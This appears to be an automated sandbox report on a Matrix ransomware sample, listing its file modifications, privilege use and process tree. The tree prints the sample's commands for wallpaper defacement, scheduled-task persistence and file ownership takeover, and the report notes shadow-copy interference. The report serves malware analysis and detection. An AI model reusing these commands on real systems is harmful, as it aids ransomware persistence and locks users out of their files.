File opened (read-only)	\??\U:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\S:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\J:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\O:	Q0OgcQKV64.exe
File opened (read-only)	\??\Q:	Q0OgcQKV64.exe
File opened (read-only)	\??\Y:	Q0OgcQKV64.exe
File opened (read-only)	\??\W:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\O:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\E:	Q0OgcQKV64.exe
File opened (read-only)	\??\G:	Q0OgcQKV64.exe
File opened (read-only)	\??\M:	Q0OgcQKV64.exe
File opened (read-only)	\??\R:	Q0OgcQKV64.exe
File opened (read-only)	\??\U:	Q0OgcQKV64.exe
File opened (read-only)	\??\V:	Q0OgcQKV64.exe
File opened (read-only)	\??\X:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\Q:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\P:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\N:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\A:	Q0OgcQKV64.exe
File opened (read-only)	\??\F:	Q0OgcQKV64.exe
File opened (read-only)	\??\Z:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\T:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\F:	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened (read-only)	\??\I:	Q0OgcQKV64.exe
File opened (read-only)	\??\J:	Q0OgcQKV64.exe
File opened (read-only)	\??\K:	Q0OgcQKV64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\1CgyGUBp.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ktab.exe	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\README.txt	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Halifax	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\blank.jtp	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\AB89_INFO.rtf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Havana	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Nassau	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Palau	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Mozilla Firefox\application.ini	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\CST6CDT	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1136	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1584	vssadmin.exe

Modifies Control Panel 5 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\WallpaperStyle = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
828	Q0OgcQKV64.exe
828	Q0OgcQKV64.exe
828	Q0OgcQKV64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
828	Q0OgcQKV64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	828	Q0OgcQKV64.exe
Token: SeLoadDriverPrivilege	828	Q0OgcQKV64.exe
Token: SeTakeOwnershipPrivilege	776	takeown.exe
Token: SeTakeOwnershipPrivilege	1924	takeown.exe
Token: SeTakeOwnershipPrivilege	1932	takeown.exe
Token: SeTakeOwnershipPrivilege	1584	takeown.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe
Token: SeTakeOwnershipPrivilege	928	takeown.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeTakeOwnershipPrivilege	1924	takeown.exe
Token: SeTakeOwnershipPrivilege	616	takeown.exe
Token: SeTakeOwnershipPrivilege	1440	takeown.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe
Token: SeTakeOwnershipPrivilege	1804	takeown.exe
Token: SeTakeOwnershipPrivilege	876	takeown.exe
Token: SeTakeOwnershipPrivilege	1996	takeown.exe
Token: SeTakeOwnershipPrivilege	924	takeown.exe
Token: SeTakeOwnershipPrivilege	824	takeown.exe
Token: SeBackupPrivilege	1960	vssvc.exe
Token: SeRestorePrivilege	1960	vssvc.exe
Token: SeAuditPrivilege	1960	vssvc.exe
Token: SeTakeOwnershipPrivilege	572	takeown.exe
Token: SeTakeOwnershipPrivilege	964	takeown.exe
Token: SeTakeOwnershipPrivilege	1940	takeown.exe
Token: SeTakeOwnershipPrivilege	1596	takeown.exe
Token: SeTakeOwnershipPrivilege	1980	takeown.exe
Token: SeTakeOwnershipPrivilege	1816	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe
Token: SeIncBasePriorityPrivilege	2036	WMIC.exe
Token: SeCreatePagefilePrivilege	2036	WMIC.exe
Token: SeBackupPrivilege	2036	WMIC.exe
Token: SeRestorePrivilege	2036	WMIC.exe
Token: SeShutdownPrivilege	2036	WMIC.exe
Token: SeDebugPrivilege	2036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2036	WMIC.exe
Token: SeRemoteShutdownPrivilege	2036	WMIC.exe
Token: SeUndockPrivilege	2036	WMIC.exe
Token: SeManageVolumePrivilege	2036	WMIC.exe
Token: 33	2036	WMIC.exe
Token: 34	2036	WMIC.exe
Token: 35	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	228	takeown.exe
Token: SeTakeOwnershipPrivilege	1096	takeown.exe
Token: SeTakeOwnershipPrivilege	1260	takeown.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe
Token: SeIncBasePriorityPrivilege	2036	WMIC.exe
Token: SeCreatePagefilePrivilege	2036	WMIC.exe
Token: SeBackupPrivilege	2036	WMIC.exe
Token: SeRestorePrivilege	2036	WMIC.exe
Token: SeShutdownPrivilege	2036	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 592	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	29
PID 1088 wrote to memory of 592	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	29
PID 1088 wrote to memory of 592	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	29
PID 1088 wrote to memory of 592	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	29
PID 1088 wrote to memory of 1816	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	31
PID 1088 wrote to memory of 1816	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	31
PID 1088 wrote to memory of 1816	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	31
PID 1088 wrote to memory of 1816	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	31
PID 1088 wrote to memory of 1736	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	33
PID 1088 wrote to memory of 1736	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	33
PID 1088 wrote to memory of 1736	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	33
PID 1088 wrote to memory of 1736	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	33
PID 1088 wrote to memory of 1648	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	34
PID 1088 wrote to memory of 1648	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	34
PID 1088 wrote to memory of 1648	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	34
PID 1088 wrote to memory of 1648	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	34
PID 1736 wrote to memory of 1568	1736	cmd.exe	37
PID 1736 wrote to memory of 1568	1736	cmd.exe	37
PID 1736 wrote to memory of 1568	1736	cmd.exe	37
PID 1736 wrote to memory of 1568	1736	cmd.exe	37
PID 1648 wrote to memory of 616	1648	cmd.exe	38
PID 1648 wrote to memory of 616	1648	cmd.exe	38
PID 1648 wrote to memory of 616	1648	cmd.exe	38
PID 1648 wrote to memory of 616	1648	cmd.exe	38
PID 1736 wrote to memory of 560	1736	cmd.exe	39
PID 1736 wrote to memory of 560	1736	cmd.exe	39
PID 1736 wrote to memory of 560	1736	cmd.exe	39
PID 1736 wrote to memory of 560	1736	cmd.exe	39
PID 1736 wrote to memory of 1588	1736	cmd.exe	40
PID 1736 wrote to memory of 1588	1736	cmd.exe	40
PID 1736 wrote to memory of 1588	1736	cmd.exe	40
PID 1736 wrote to memory of 1588	1736	cmd.exe	40
PID 1088 wrote to memory of 1580	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	41
PID 1088 wrote to memory of 1580	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	41
PID 1088 wrote to memory of 1580	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	41
PID 1088 wrote to memory of 1580	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	41
PID 1580 wrote to memory of 1884	1580	cmd.exe	43
PID 1580 wrote to memory of 1884	1580	cmd.exe	43
PID 1580 wrote to memory of 1884	1580	cmd.exe	43
PID 1580 wrote to memory of 1884	1580	cmd.exe	43
PID 1580 wrote to memory of 1940	1580	cmd.exe	44
PID 1580 wrote to memory of 1940	1580	cmd.exe	44
PID 1580 wrote to memory of 1940	1580	cmd.exe	44
PID 1580 wrote to memory of 1940	1580	cmd.exe	44
PID 1580 wrote to memory of 1928	1580	cmd.exe	45
PID 1580 wrote to memory of 1928	1580	cmd.exe	45
PID 1580 wrote to memory of 1928	1580	cmd.exe	45
PID 1580 wrote to memory of 1928	1580	cmd.exe	45
PID 1928 wrote to memory of 1920	1928	cmd.exe	46
PID 1928 wrote to memory of 1920	1928	cmd.exe	46
PID 1928 wrote to memory of 1920	1928	cmd.exe	46
PID 1928 wrote to memory of 1920	1928	cmd.exe	46
PID 1920 wrote to memory of 828	1920	Q0OgcQKV.exe	48
PID 1920 wrote to memory of 828	1920	Q0OgcQKV.exe	48
PID 1920 wrote to memory of 828	1920	Q0OgcQKV.exe	48
PID 1920 wrote to memory of 828	1920	Q0OgcQKV.exe	48
PID 1088 wrote to memory of 432	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	49
PID 1088 wrote to memory of 432	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	49
PID 1088 wrote to memory of 432	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	49
PID 1088 wrote to memory of 432	1088	afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe	49
PID 432 wrote to memory of 1644	432	cmd.exe	51
PID 432 wrote to memory of 1644	432	cmd.exe	51
PID 432 wrote to memory of 1644	432	cmd.exe	51
PID 432 wrote to memory of 1644	432	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe
"C:\Users\Admin\AppData\Local\Temp\afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40.bin.exe" "C:\Users\Admin\AppData\Local\Temp\NWfdXYud.exe"
  2⤵
  PID:592
- C:\Users\Admin\AppData\Local\Temp\NWfdXYud.exe
  "C:\Users\Admin\AppData\Local\Temp\NWfdXYud.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\1CgyGUBp.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\1CgyGUBp.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    - Modifies Control Panel
    PID:1568
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:560
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\RcotORfb.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1648
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\RcotORfb.vbs"
    3⤵
    PID:616
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KAoBt5GB.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1484
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\KAoBt5GB.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1136
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:316
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1928
